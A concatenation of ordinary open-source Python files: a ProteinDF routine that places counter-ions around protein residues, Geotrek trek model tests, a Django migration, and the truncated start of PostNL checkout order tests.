n.norm()
nx = n.x
ny = n.y
nz = n.z
rot = Matrix(3, 3)
rot.set(0, 0, nx * nx * (1.0 - cos_theta) + cos_theta)
rot.set(0, 1, nx * ny * (1.0 - cos_theta) + nz * sin_theta)
rot.set(0, 2, nx * nz * (1.0 - cos_theta) - ny * sin_theta)
rot.set(1, 0, nx * ny * (1.0 - cos_theta) - nz * sin_theta)
rot.set(1, 1, ny * ny * (1.0 - cos_theta) + cos_theta)
rot.set(1, 2, nx * nz * (1.0 - cos_theta) + nx * sin_theta)
rot.set(2, 0, nx * nz * (1.0 - cos_theta) + ny * sin_theta)
rot.set(2, 1, ny * nz * (1.0 - cos_theta) - nx * sin_theta)
rot.set(2, 2, nz * nz * (1.0 - cos_theta) + cos_theta)
return rot
# -----------------------------------------------------------------
def get_last_index(self, res):
answer = 0
re_obj = re.compile('([0-9]+)')
for key, atom in res.atoms():
m = re_obj.search(key)
if m is not None:
num = m.group(0)
num = int(num)
answer = max(num, answer)
return answer
# -----------------------------------------------------------------
def neutralize_Nterm(self, res):
answer = None
if res.name == "PRO":
answer = self._neutralize_Nterm_PRO(res)
else:
answer = self._neutralize_Nterm(res)
return answer
def _neutralize_Nterm(self, res):
"""
N末端側を中性化するためにCl-(AtomGroup)を返す
H1, N2, HXT(or H3)が指定されている必要があります。
"""
ag = AtomGroup()
ag.set_atom('N', res['N'])
ag.set_atom('H1', res['H1'])
ag.set_atom('H2', res['H2'])
if res.has_atom('HXT'):
ag.set_atom('H3', res['HXT'])
elif res.has_atom('H3'):
ag.set_atom('H3', res['H3'])
pos = self._get_neutralize_pos_NH3_type(ag)
answer = AtomGroup()
Cl = Atom(symbol='Cl',
name='Cl',
position=pos)
answer.set_atom('Cl', Cl)
return answer
def _neutralize_Nterm_PRO(self, res):
"""in case of 'PRO', neutralize N-term
"""
ag = AtomGroup()
ag.set_atom('N', res['N'])
ag.set_atom('H2', res['H2'])
if res.has_atom('HXT'):
ag.set_atom('H1', res['HXT'])
elif res.has_atom('H3'):
ag.set_atom('H1', res['H3'])
pos = self._get_neutralize_pos_NH2_type(ag)
answer = AtomGroup()
Cl = Atom(symbol='Cl',
name='Cl',
position=pos)
answer.set_atom('Cl', Cl)
return answer
def neutralize_Cterm(self, res):
"""
C末端側を中性化するためにNa+(AtomGroup)を返す
"""
ag = AtomGroup()
ag.set_atom('C', res['C'])
ag.set_atom('O1', res['O'])
ag.set_atom('O2', res['OXT'])
pos = self._get_neutralize_pos_COO_type(ag)
answer = AtomGroup()
Na = Atom(symbol='Na',
name='Na',
position=pos)
answer.set_atom('Na', Na)
return answer
# -----------------------------------------------------------------
def neutralize_GLU(self, res):
ag = AtomGroup()
ag.set_atom('C', res['CD'])
ag.set_atom('O1', res['OE1'])
ag.set_atom('O2', res['OE2'])
pos = self._get_neutralize_pos_COO_type(ag)
answer = AtomGroup()
Na = Atom(symbol='Na',
name='Na',
position=pos)
key = self.get_last_index(res)
answer.set_atom('{}_Na'.format(key + 1), Na)
return answer
def neutralize_ASP(self, res):
ag = AtomGroup()
ag.set_atom('C', res['CG'])
ag.set_atom('O1', res['OD1'])
ag.set_atom('O2', res['OD2'])
pos = self._get_neutralize_pos_COO_type(ag)
answer = AtomGroup()
Na = Atom(symbol='Na',
name='Na',
position=pos)
key = self.get_last_index(res)
answer.set_atom('{}_Na'.format(key + 1), Na)
return answer
def neutralize_LYS(self, res):
ag = AtomGroup()
ag.set_atom('N', res['NZ'])
ag.set_atom('H1', res['HZ1'])
ag.set_atom('H2', res['HZ2'])
ag.set_atom('H3', res['HZ3'])
pos = self._get_neutralize_pos_NH3_type(ag)
answer = AtomGroup()
Cl = Atom(symbol='Cl',
name='Cl',
position=pos)
key = self.get_last_index(res)
answer.set_atom('{}_Cl'.format(key + 1), Cl)
return answer
def neutralize_ARG(self, res, case=0):
"""
case: 0; 中央
case: 1; NH1側
case: 2; NH2側
"""
case = int(case)
pos = Position()
if case == 0:
length = 3.0
NH1 = res['NH1']
NH2 = res['NH2']
CZ = res['CZ']
M = Position(0.5 * (NH1.xyz.x + NH2.xyz.x),
0.5 * (NH1.xyz.y + NH2.xyz.y),
0.5 * (NH1.xyz.z + NH2.xyz.z))
vCM = M - CZ.xyz
vCM.norm()
pos = CZ.xyz + length * vCM
elif case == 1:
length = 2.0
HH11 = res['HH11']
HH12 = res['HH12']
N = res['NH1']
M = Position(0.5 * (HH11.xyz.x + HH12.xyz.x),
0.5 * (HH11.xyz.y + HH12.xyz.y),
0.5 * (HH11.xyz.z + HH12.xyz.z))
vNM = M - N.xyz
vNM.norm()
pos = N.xyz + length * vNM
elif case == 2:
length = 2.0
HH21 = res['HH21']
HH22 = res['HH22']
N = res['NH2']
M = Position(0.5 * (HH21.xyz.x + HH22.xyz.x),
0.5 * (HH21.xyz.y + HH22.xyz.y),
0.5 * (HH21.xyz.z + HH22.xyz.z))
vNM = M - N.xyz
vNM.norm()
pos = N.xyz + length * vNM
else:
pass
answer = AtomGroup()
Cl = Atom(symbol='Cl',
name='Cl',
position=pos)
key = self.get_last_index(res)
answer.set_atom('{}_Cl'.format(key + 1), Cl)
return answer
# ------------------------------------------------------------------
def neutralize_FAD(self, ag):
print("neutralize_FAD")
print(ag)
answer = AtomGroup()
POO1 = AtomGroup()
POO1.set_atom('P', ag['P'])
# amber format: OP1, pdb: O1P
if ag.has_atom('O1P'):
POO1.set_atom('O1', ag['O1P'])
elif ag.has_atom('OP1'):
POO1.set_atom('O1', ag['OP1'])
else:
raise
# amber format: OP2, pdb: O2P
if ag.has_atom('O2P'):
POO1.set_atom('O2', ag['O2P'])
elif ag.has_atom('OP2'):
POO1.set_atom('O2', ag['OP2'])
else:
raise
Na1 = Atom(symbol='Na',
name='Na',
position=self._get_neutralize_pos_POO_type(POO1))
POO2 = AtomGroup()
POO2.set_atom('P', ag['PA'])
POO2.set_atom('O1', ag['O1A']) # amber format: OA1, pdb: O1A
POO2.set_atom('O2', ag['O2A']) # amber format: OA2, pdb: O2A
Na2 = Atom(symbol='Na',
name='Na',
position=self._get_neutralize_pos_POO_type(POO2))
key = self.get_last_index(ag)
answer.set_atom('{}_Na1'.format(key + 1), Na1)
answer.set_atom('{}_Na2'.format(key + 1), Na2)
return answer
# ------------------------------------------------------------------
def _get_neutralize_pos_NH3_type(self, ag):
length = 3.187
H1 = ag['H1']
H2 = ag['H2']
H3 = ag['H3']
N = ag['N']
# 重心を計算
M = Position((H1.xyz.x + H2.xyz.x + H3.xyz.x) / 3.0,
(H1.xyz.y + H2.xyz.y + H3.xyz.y) / 3.0,
(H1.xyz.z + H2.xyz.z + H3.xyz.z) / 3.0)
vNM = M - N.xyz
vNM.norm()
return N.xyz + length * vNM
def _get_neutralize_pos_NH2_type(self, ag):
length = 3.187
H1 = ag['H1']
H2 = ag['H2']
N = ag['N']
vNH1 = H1.xyz - N.xyz
vNH2 = H2.xyz - N.xyz
vM = 0.5 * (vNH1 + vNH2)
vM.norm()
answer = N.xyz + length * vM
return answer
def _get_neutralize_pos_COO_type(self, ag):
length = 2.521
O1 = ag['O1']
O2 = ag['O2']
C = ag['C']
# 中点を計算
M = Position(0.5 * (O1.xyz.x + O2.xyz.x),
0.5 * (O1.xyz.y + O2.xyz.y),
0.5 * (O1.xyz.z + O2.xyz.z))
vCM = M - C.xyz
vCM.norm()
return C.xyz + length * vCM
# -----------------------------------------------------------------
def _get_neutralize_pos_POO_type(self, ag):
length = 2.748
O1 = ag['O1']
O2 = ag['O2']
P = ag['P']
M = Position(0.5 * (O1.xyz.x + O2.xyz.x),
0.5 * (O1.xyz.y + O2.xyz.y),
0.5 * (O1.xyz.z + O2.xyz.z))
vPM = M - P.xyz
vPM.norm()
return P.xyz + length * vPM
if __name__ == "__main__":
import doctest
doctest.testmod()
|
ProteinDF/ProteinDF_bridge
|
proteindf_bridge/modeling.py
|
Python
|
gpl-3.0
| 24,765 | 0.000371 |
from django.test import TestCase
from django.contrib.gis.geos import (LineString, Polygon, MultiPolygon,
MultiLineString, MultiPoint, Point)
from django.core.exceptions import ValidationError
from django.conf import settings
from django.test.utils import override_settings
from unittest import skipIf
from bs4 import BeautifulSoup
from geotrek.common.tests import TranslationResetMixin
from geotrek.core.tests.factories import PathFactory
from geotrek.zoning.tests.factories import DistrictFactory, CityFactory
from geotrek.trekking.tests.factories import (POIFactory, TrekFactory,
TrekWithPOIsFactory, ServiceFactory,
RatingFactory, RatingScaleFactory)
from geotrek.trekking.models import Trek, OrderedTrekChild
class TrekTest(TranslationResetMixin, TestCase):
def test_is_publishable(self):
t = TrekFactory.create()
t.geom = LineString((0, 0), (1, 1))
self.assertTrue(t.has_geom_valid())
t.description_teaser = ''
self.assertFalse(t.is_complete())
self.assertFalse(t.is_publishable())
t.description_teaser = 'ba'
t.departure = 'zin'
t.arrival = 'ga'
self.assertTrue(t.is_complete())
self.assertTrue(t.is_publishable())
t.geom = MultiLineString([LineString((0, 0), (1, 1)), LineString((2, 2), (3, 3))])
self.assertFalse(t.has_geom_valid())
self.assertFalse(t.is_publishable())
def test_any_published_property(self):
t = TrekFactory.create(published=False)
t.published_fr = False
t.published_it = False
t.save()
self.assertFalse(t.any_published)
t.published_it = True
t.save()
self.assertTrue(t.any_published)
@override_settings(PUBLISHED_BY_LANG=False)
def test_any_published_without_published_by_lang(self):
t = TrekFactory.create(published=False)
t.published_fr = True
t.save()
self.assertFalse(t.any_published)
def test_published_status(self):
t = TrekFactory.create(published=False)
t.published_fr = False
t.published_it = True
t.save()
self.assertEqual(t.published_status, [
{'lang': 'en', 'language': 'English', 'status': False},
{'lang': 'es', 'language': 'Spanish', 'status': False},
{'lang': 'fr', 'language': 'French', 'status': False},
{'lang': 'it', 'language': 'Italian', 'status': True}])
@override_settings(PUBLISHED_BY_LANG=False)
def test_published_status_without_published_by_lang(self):
t = TrekFactory.create(published=True)
t.published_fr = False
t.published_it = False
t.save()
self.assertEqual(t.published_status, [
{'lang': 'en', 'language': 'English', 'status': True},
{'lang': 'es', 'language': 'Spanish', 'status': True},
{'lang': 'fr', 'language': 'French', 'status': True},
{'lang': 'it', 'language': 'Italian', 'status': True}])
@override_settings(PUBLISHED_BY_LANG=False)
def test_published_langs_without_published_by_lang_not_published(self):
t = TrekFactory.create(published=False)
t.published_fr = True
t.published_it = True
t.save()
self.assertEqual(t.published_langs, [])
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
def test_kml_coordinates_should_be_3d(self):
trek = TrekWithPOIsFactory.create()
kml = trek.kml()
parsed = BeautifulSoup(kml, 'lxml')
for placemark in parsed.findAll('placemark'):
coordinates = placemark.find('coordinates')
tuples = [s.split(',') for s in coordinates.string.split(' ')]
self.assertTrue(all([len(i) == 3 for i in tuples]))
def test_pois_types(self):
trek = TrekWithPOIsFactory.create()
type0 = trek.pois[0].type
type1 = trek.pois[1].type
self.assertEqual(2, len(trek.poi_types))
self.assertIn(type0, trek.poi_types)
self.assertIn(type1, trek.poi_types)
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
def test_delete_cascade(self):
p1 = PathFactory.create()
p2 = PathFactory.create()
t = TrekFactory.create(paths=[p1, p2])
# Everything should be all right before delete
self.assertTrue(t.published)
self.assertFalse(t.deleted)
self.assertEqual(t.aggregations.count(), 2)
# When a path is deleted
p1.delete()
t = Trek.objects.get(pk=t.pk)
self.assertFalse(t.published)
self.assertFalse(t.deleted)
self.assertEqual(t.aggregations.count(), 1)
# Reset published status
t.published = True
t.save()
# When all paths are deleted
p2.delete()
t = Trek.objects.get(pk=t.pk)
self.assertFalse(t.published)
self.assertTrue(t.deleted)
self.assertEqual(t.aggregations.count(), 0)
def test_treks_are_sorted_by_name(self):
TrekFactory.create(name='Cb')
TrekFactory.create(name='Ca')
TrekFactory.create(name='A')
TrekFactory.create(name='B')
self.assertQuerysetEqual(Trek.objects.all(),
['<Trek: A>', '<Trek: B>', '<Trek: Ca>', '<Trek: Cb>'],
ordered=False)
def test_trek_itself_as_parent(self):
"""
Test if a trek it is its own parent
"""
trek1 = TrekFactory.create(name='trek1')
OrderedTrekChild.objects.create(parent=trek1, child=trek1)
self.assertRaisesMessage(ValidationError,
"Cannot use itself as child trek.",
trek1.full_clean)
class TrekPublicationDateTest(TranslationResetMixin, TestCase):
def setUp(self):
self.trek = TrekFactory.create(published=False)
def test_default_value_is_null(self):
self.assertIsNone(self.trek.publication_date)
def test_takes_current_date_when_published_becomes_true(self):
self.trek.published = True
self.trek.save()
self.assertIsNotNone(self.trek.publication_date)
def test_becomes_null_when_unpublished(self):
self.test_takes_current_date_when_published_becomes_true()
self.trek.published = False
self.trek.save()
self.assertIsNone(self.trek.publication_date)
def test_date_is_not_updated_when_saved_again(self):
import datetime
self.test_takes_current_date_when_published_becomes_true()
old_date = datetime.date(2003, 8, 6)
self.trek.publication_date = old_date
self.trek.save()
self.assertEqual(self.trek.publication_date, old_date)
class RelatedObjectsTest(TranslationResetMixin, TestCase):
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
def test_helpers(self):
p1 = PathFactory.create(geom=LineString((0, 0), (4, 4)))
p2 = PathFactory.create(geom=LineString((4, 4), (8, 8)))
trek = TrekFactory.create(paths=[(p1, 0.5, 1), (p2, 0, 1)])
poi = POIFactory.create(paths=[(p1, 0.6, 0.6)])
poi2 = POIFactory.create(paths=[(p1, 0.6, 0.6)])
service = ServiceFactory.create(paths=[(p1, 0.7, 0.7)])
service.type.practices.add(trek.practice)
trek.pois_excluded.add(poi2.pk)
# /!\ District are automatically linked to paths at DB level
d1 = DistrictFactory.create(geom=MultiPolygon(
Polygon(((-2, -2), (3, -2), (3, 3), (-2, 3), (-2, -2)))))
# Ensure related objects are accessible
self.assertCountEqual(trek.pois_excluded.all(), [poi2])
self.assertCountEqual(trek.all_pois, [poi, poi2])
self.assertCountEqual(trek.pois, [poi])
self.assertCountEqual(trek.services, [service])
self.assertCountEqual(poi.treks, [trek])
self.assertCountEqual(service.treks, [trek])
self.assertCountEqual(trek.districts, [d1])
# Ensure there is no duplicates
self.assertCountEqual(trek.pois_excluded.all(), [poi2])
self.assertCountEqual(trek.all_pois, [poi, poi2])
self.assertCountEqual(trek.pois, [poi])
self.assertCountEqual(trek.services, [service])
self.assertCountEqual(poi.treks, [trek])
self.assertCountEqual(service.treks, [trek])
d2 = DistrictFactory.create(geom=MultiPolygon(
Polygon(((3, 3), (9, 3), (9, 9), (3, 9), (3, 3)))))
self.assertCountEqual(trek.districts, [d1, d2])
@skipIf(settings.TREKKING_TOPOLOGY_ENABLED, 'Test without dynamic segmentation only')
def test_helpers_nds(self):
trek = TrekFactory.create(geom=LineString((2, 2), (8, 8)))
poi = POIFactory.create(geom=Point(2.4, 2.4))
poi2 = POIFactory.create(geom=Point(2.4, 2.4))
service = ServiceFactory.create(geom=Point(2.8, 2.8))
service.type.practices.add(trek.practice)
trek.pois_excluded.add(poi2.pk)
# /!\ District are automatically linked to paths at DB level
d1 = DistrictFactory.create(geom=MultiPolygon(
Polygon(((-2, -2), (3, -2), (3, 3), (-2, 3), (-2, -2)))))
# Ensure related objects are accessible
self.assertCountEqual(trek.pois_excluded.all(), [poi2])
self.assertCountEqual(trek.all_pois, [poi, poi2])
self.assertCountEqual(trek.pois, [poi])
self.assertCountEqual(trek.services, [service])
self.assertCountEqual(poi.treks, [trek])
self.assertCountEqual(service.treks, [trek])
self.assertCountEqual(trek.districts, [d1])
@skipIf(settings.TREKKING_TOPOLOGY_ENABLED, 'Test without dynamic segmentation only')
def test_deleted_pois_nds(self):
trek = TrekFactory.create(geom=LineString((0, 0), (4, 4)))
poi = POIFactory.create(geom=Point(2.4, 2.4))
self.assertCountEqual(trek.pois, [poi])
poi.delete()
self.assertCountEqual(trek.pois, [])
@skipIf(settings.TREKKING_TOPOLOGY_ENABLED, 'Test without dynamic segmentation only')
def test_deleted_services_nds(self):
trek = TrekFactory.create(geom=LineString((0, 0), (4, 4)))
service = ServiceFactory.create(geom=Point(2.4, 2.4))
service.type.practices.add(trek.practice)
self.assertCountEqual(trek.services, [service])
service.delete()
self.assertCountEqual(trek.services, [])
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
def test_deleted_pois(self):
p1 = PathFactory.create(geom=LineString((0, 0), (4, 4)))
trek = TrekFactory.create(paths=[p1])
poi = POIFactory.create(paths=[(p1, 0.6, 0.6)])
self.assertCountEqual(trek.pois, [poi])
poi.delete()
self.assertCountEqual(trek.pois, [])
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
def test_deleted_services(self):
p1 = PathFactory.create(geom=LineString((0, 0), (4, 4)))
trek = TrekFactory.create(paths=[p1])
service = ServiceFactory.create(paths=[(p1, 0.6, 0.6)])
service.type.practices.add(trek.practice)
self.assertCountEqual(trek.services, [service])
service.delete()
self.assertCountEqual(trek.services, [])
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
def test_pois_should_be_ordered_by_progression(self):
p1 = PathFactory.create(geom=LineString((0, 0), (4, 4)))
p2 = PathFactory.create(geom=LineString((4, 4), (8, 8)))
self.trek = TrekFactory.create(paths=[p1, p2])
self.trek_reverse = TrekFactory.create(paths=[(p2, 0.8, 0), (p1, 1, 0.2)])
self.poi1 = POIFactory.create(paths=[(p1, 0.8, 0.8)])
self.poi2 = POIFactory.create(paths=[(p1, 0.3, 0.3)])
self.poi3 = POIFactory.create(paths=[(p2, 0.5, 0.5)])
pois = self.trek.pois
self.assertEqual([self.poi2, self.poi1, self.poi3], list(pois))
pois = self.trek_reverse.pois
self.assertEqual([self.poi3, self.poi1, self.poi2], list(pois))
@skipIf(settings.TREKKING_TOPOLOGY_ENABLED, 'Test without dynamic segmentation only')
def test_pois_is_not_ordered_by_progression(self):
self.trek = TrekFactory.create(geom=LineString((0, 0), (8, 8)))
self.trek_reverse = TrekFactory.create(geom=LineString((6.4, 6.4), (0.8, 0.8)))
self.poi1 = POIFactory.create(geom=Point(3.2, 3.2))
self.poi2 = POIFactory.create(geom=Point(1.2, 1.2))
self.poi3 = POIFactory.create(geom=Point(4, 4))
pois = self.trek.pois
self.assertCountEqual([self.poi1, self.poi2, self.poi3], pois)
pois = self.trek_reverse.pois
self.assertCountEqual([self.poi1, self.poi2, self.poi3], pois)
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
def test_city_departure(self):
p1 = PathFactory.create(geom=LineString((0, 0), (5, 5)))
trek = TrekFactory.create(paths=[p1])
self.assertEqual(trek.city_departure, '')
city1 = CityFactory.create(geom=MultiPolygon(Polygon(((-1, -1), (3, -1), (3, 3),
(-1, 3), (-1, -1)))))
city2 = CityFactory.create(geom=MultiPolygon(Polygon(((3, 3), (9, 3), (9, 9),
(3, 9), (3, 3)))))
self.assertEqual([city for city in trek.cities], [city1, city2])
self.assertEqual(trek.city_departure, str(city1))
@skipIf(settings.TREKKING_TOPOLOGY_ENABLED, 'Test without dynamic segmentation only')
def test_city_departure_nds(self):
trek = TrekFactory.create(geom=LineString((0, 0), (5, 5)))
self.assertEqual(trek.city_departure, '')
city1 = CityFactory.create(geom=MultiPolygon(Polygon(((-1, -1), (3, -1), (3, 3),
(-1, 3), (-1, -1)))))
city2 = CityFactory.create(geom=MultiPolygon(Polygon(((3, 3), (9, 3), (9, 9),
(3, 9), (3, 3)))))
self.assertEqual([city for city in trek.cities], [city1, city2])
self.assertEqual(trek.city_departure, str(city1))
class TrekUpdateGeomTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.trek = TrekFactory.create(published=True, geom=LineString(((700000, 6600000), (700100, 6600100)), srid=2154))
def test_save_with_same_geom(self):
geom = LineString(((700000, 6600000), (700100, 6600100)), srid=2154)
self.trek.geom = geom
self.trek.save()
retrieve_trek = Trek.objects.get(pk=self.trek.pk)
self.assertTrue(retrieve_trek.geom.equals_exact(geom, tolerance=0.00001))
def test_save_with_another_geom(self):
geom = LineString(((-7, -7), (5, -7), (5, 5), (-7, 5), (-7, -7)), srid=2154)
self.trek.geom = geom
self.trek.save()
retrieve_trek = Trek.objects.get(pk=self.trek.pk)
if settings.TREKKING_TOPOLOGY_ENABLED:
self.assertFalse(retrieve_trek.geom.equals_exact(geom, tolerance=0.00001))
else:
self.assertTrue(retrieve_trek.geom.equals_exact(geom, tolerance=0.00001))
def test_save_with_provided_one_field_exclusion(self):
self.trek.save(update_fields=['geom'])
self.assertTrue(self.trek.pk)
def test_save_with_multiple_fields_exclusion(self):
new_trek = TrekFactory.create()
new_trek.description_en = 'Description Test update'
new_trek.ambiance = 'Very special ambiance, for test purposes.'
new_trek.save(update_fields=['description_en'])
db_trek = Trek.objects.get(pk=new_trek.pk)
self.assertTrue(db_trek.pk)
self.assertEqual(db_trek.description_en, 'Description Test update')
self.assertNotEqual(db_trek.ambiance, 'Very special ambiance, for test purposes.')
new_trek.save(update_fields=['ambiance_en'])
db_trek = Trek.objects.get(pk=new_trek.pk)
self.assertEqual(db_trek.ambiance_en, 'Very special ambiance, for test purposes.')
class TrekItinerancyTest(TestCase):
def test_next_previous(self):
trekA = TrekFactory(name="A")
trekB = TrekFactory(name="B")
trekC = TrekFactory(name="C")
trekD = TrekFactory(name="D")
OrderedTrekChild(parent=trekC, child=trekA, order=42).save()
OrderedTrekChild(parent=trekC, child=trekB, order=15).save()
OrderedTrekChild(parent=trekD, child=trekA, order=1).save()
self.assertEqual(list(trekA.children_id), [])
self.assertEqual(list(trekB.children_id), [])
self.assertEqual(list(trekC.children_id), [trekB.id, trekA.id])
self.assertEqual(list(trekD.children_id), [trekA.id])
self.assertEqual(trekA.next_id, {trekC.id: None, trekD.id: None})
self.assertEqual(trekB.next_id, {trekC.id: trekA.id})
self.assertEqual(trekC.next_id, {})
self.assertEqual(trekD.next_id, {})
self.assertEqual(trekA.previous_id, {trekC.id: trekB.id, trekD.id: None})
self.assertEqual(trekB.previous_id, {trekC.id: None})
self.assertEqual(trekC.previous_id, {})
self.assertEqual(trekD.previous_id, {})
def test_delete_child(self):
trekA = TrekFactory(name="A")
trekB = TrekFactory(name="B")
trekC = TrekFactory(name="C")
OrderedTrekChild(parent=trekA, child=trekB, order=1).save()
OrderedTrekChild(parent=trekA, child=trekC, order=2).save()
self.assertTrue(OrderedTrekChild.objects.filter(child=trekB).exists())
self.assertQuerysetEqual(trekA.children, ['<Trek: B>', '<Trek: C>'])
self.assertQuerysetEqual(trekB.parents, ['<Trek: A>'])
self.assertQuerysetEqual(trekC.parents, ['<Trek: A>'])
self.assertEqual(list(trekA.children_id), [trekB.id, trekC.id])
self.assertEqual(trekB.parents_id, [trekA.id])
self.assertEqual(trekC.parents_id, [trekA.id])
trekB.delete()
self.assertEqual(trekC.previous_id_for(trekA), None)
self.assertEqual(trekC.next_id_for(trekA), None)
self.assertEqual(trekC.next_id, {trekA.id: None})
self.assertEqual(trekC.previous_id, {trekA.id: None})
self.assertFalse(OrderedTrekChild.objects.filter(child=trekB).exists())
self.assertQuerysetEqual(trekA.children, ['<Trek: C>'])
self.assertQuerysetEqual(trekC.parents, ['<Trek: A>'])
self.assertEqual(list(trekA.children_id), [trekC.id])
self.assertEqual(trekC.parents_id, [trekA.id])
def test_delete_parent(self):
trekA = TrekFactory(name="A")
trekB = TrekFactory(name="B")
trekC = TrekFactory(name="C")
OrderedTrekChild(parent=trekB, child=trekA, order=1).save()
OrderedTrekChild(parent=trekC, child=trekA, order=2).save()
self.assertTrue(OrderedTrekChild.objects.filter(parent=trekB).exists())
self.assertQuerysetEqual(trekA.parents, ['<Trek: B>', '<Trek: C>'], ordered=False)
self.assertQuerysetEqual(trekB.children, ['<Trek: A>'])
self.assertQuerysetEqual(trekC.children, ['<Trek: A>'])
self.assertEqual(trekA.parents_id, [trekB.id, trekC.id])
self.assertEqual(list(trekB.children_id), [trekA.id])
self.assertEqual(list(trekC.children_id), [trekA.id])
trekB.delete()
self.assertEqual(trekA.previous_id_for(trekC), None)
self.assertEqual(trekA.next_id_for(trekC), None)
self.assertEqual(trekA.next_id, {trekC.id: None})
self.assertEqual(trekA.previous_id, {trekC.id: None})
self.assertFalse(OrderedTrekChild.objects.filter(parent=trekB).exists())
self.assertQuerysetEqual(trekA.parents, ['<Trek: C>'])
self.assertQuerysetEqual(trekC.children, ['<Trek: A>'])
self.assertEqual(trekA.parents_id, [trekC.id])
self.assertEqual(list(trekC.children_id), [trekA.id])
class MapImageExtentTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.trek = TrekFactory.create(
points_reference=MultiPoint([Point(0, 0), Point(1, 1)], srid=settings.SRID),
parking_location=Point(0, 0, srid=settings.SRID),
)
POIFactory.create(paths=[(cls.trek.paths.first(), 0.25, 0.25)], published=True)
def test_get_map_image_extent(self):
lng_min, lat_min, lng_max, lat_max = self.trek.get_map_image_extent()
self.assertAlmostEqual(lng_min, -1.3630812101179004)
self.assertAlmostEqual(lat_min, -5.983856309208769)
self.assertAlmostEqual(lng_max, 3.001303976720215)
self.assertAlmostEqual(lat_max, 46.50090044234927)
class RatingScaleTest(TestCase):
def test_ratingscale_str(self):
scale = RatingScaleFactory.create(name='Bar', practice__name='Foo')
self.assertEqual(str(scale), 'Bar (Foo)')
class RatingTest(TestCase):
def test_rating_str(self):
scale = RatingFactory.create(name='Bar')
self.assertEqual(str(scale), 'RatingScale : Bar')
|
GeotrekCE/Geotrek-admin
|
geotrek/trekking/tests/test_models.py
|
Python
|
bsd-2-clause
| 21,282 | 0.001786 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-20 23:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('authentication', '0003_auto_20160620_2027'),
('feed', '0005_auto_20160620_1547'),
]
operations = [
migrations.AddField(
model_name='post',
name='author',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='posts', to='authentication.Profile'),
preserve_default=False,
),
]
|
winstein27/social
|
social/feed/migrations/0006_post_author.py
|
Python
|
agpl-3.0
| 660 | 0.001515 |
import datetime
import decimal
from django.test import TestCase
from django.core.cache import cache
from httmock import HTTMock
from django_dynamic_fixture import G, N
from postnl_checkout.contrib.django_postnl_checkout.models import Order
from .base import PostNLTestMixin
class OrderTests(PostNLTestMixin, TestCase):
""" Tests for Order model. """
maxDiff = None
def setUp(self):
super(OrderTests, self).setUp()
self.order_datum = datetime.datetime(
year=2011, month=7, day=21,
hour=20, minute=11, second=0
)
self.verzend_datum = datetime.datetime(
year=2011, month=7, day=22,
hour=20, minute=11, second=0
)
def test_save(self):
""" Test saving an Order model. """
instance = N(Order)
instance.clean()
instance.save()
def test_prepare_order(self):
""" Test prepare_order class method. """
# Setup mock response
def response(url, request):
self.assertXMLEqual(
request.body, self.read_file('prepare_order_request.xml')
)
return self.read_file('prepare_order_response.xml')
kwargs = {
'AangebodenBetaalMethoden': {
'PrepareOrderBetaalMethode': {
'Code': 'IDEAL',
'Prijs': '5.00'
}
},
'AangebodenCommunicatieOpties': {
'PrepareOrderCommunicatieOptie': {
'Code': 'NEWS'
}
},
# FIXME: the following is not submitted by SUDS
# Most probably because it is not properly defined in the WSDL
# Contact PostNL about this.
# 'AangebodenOpties': {
# 'PrepareOrderOptie': {
# 'Code': 'WRAP',
# 'Prijs': '2.50'
# }
# },
# 'AfleverOpties': {
# 'AfleverOptie': {
# 'Code': 'PG',
# 'Kosten': '0.00',
# 'Toegestaan': True
# }
# },
'Consument': {
'ExtRef': 'test@e-id.nl'
},
'Contact': {
'Url': 'http://www.kadowereld.nl/url/contact'
},
'Order': {
'ExtRef': '1105_900',
'OrderDatum': self.order_datum,
'Subtotaal': '125.00',
'VerzendDatum': self.verzend_datum,
'VerzendKosten': '12.50'
},
'Retour': {
'BeschrijvingUrl': 'http://www.kadowereld.nl/url/beschrijving',
'PolicyUrl': 'http://www.kadowereld.nl/url/policy',
'RetourTermijn': 28,
'StartProcesUrl': 'http://www.kadowereld.nl/url/startproces'
},
'Service': {
'Url': 'http://www.kadowereld.nl/url/service'
}
}
# Execute API call
with HTTMock(response):
instance = Order.prepare_order(**kwargs)
# Assert model field values
self.assertTrue(instance.pk)
self.assertEquals(
instance.order_token, '0cfb4be2-47cf-4eac-865c-d66657953d5c'
)
self.assertEquals(
instance.order_ext_ref, '1105_900'
)
self.assertEquals(
instance.order_date, self.order_datum
)
# Assert JSON values
self.assertEquals(instance.prepare_order_request, kwargs)
self.assertEquals(instance.prepare_order_response, {
'Checkout': {
'OrderToken': '0cfb4be2-47cf-4eac-865c-d66657953d5c',
'Url': (
'http://tpppm-test.e-id.nl/Orders/OrderCheckout'
'?token=0cfb4be2-47cf-4eac-865c-d66657953d5c'
)
},
'Webshop': {
'IntRef': 'a0713e4083a049a996c302f48bb3f535'
}
})
def test_read_order(self):
""" Test read_order method. """
# Setup mock response
def response(url, request):
self.assertXMLEqual(
request.body, self.read_file('read_order_request.xml')
)
return self.read_file('read_order_response.xml')
instance = G(
Order,
order_token='0cfb4be2-47cf-4eac-865c-d66657953d5c'
)
# Read order data
with HTTMock(response):
new_instance = instance.read_order()
response_data = new_instance.read_order_response
self.assertTrue(response_data)
self.assertEquals(response_data, {
'Voorkeuren': {
'Bezorging': {
'Tijdvak': {
'Start': u'10:30',
'Eind': u'08:30'
},
'Datum': datetime.datetime(2012, 4, 26, 0, 0)
}
},
'Consument': {
'GeboorteDatum': datetime.datetime(1977, 6, 15, 0, 0),
'ExtRef': u'jjansen',
'TelefoonNummer': u'06-12345678',
'Email': u'j.jansen@e-id.nl'
},
'Facturatie': {
'Adres': {
'Huisnummer': u'1',
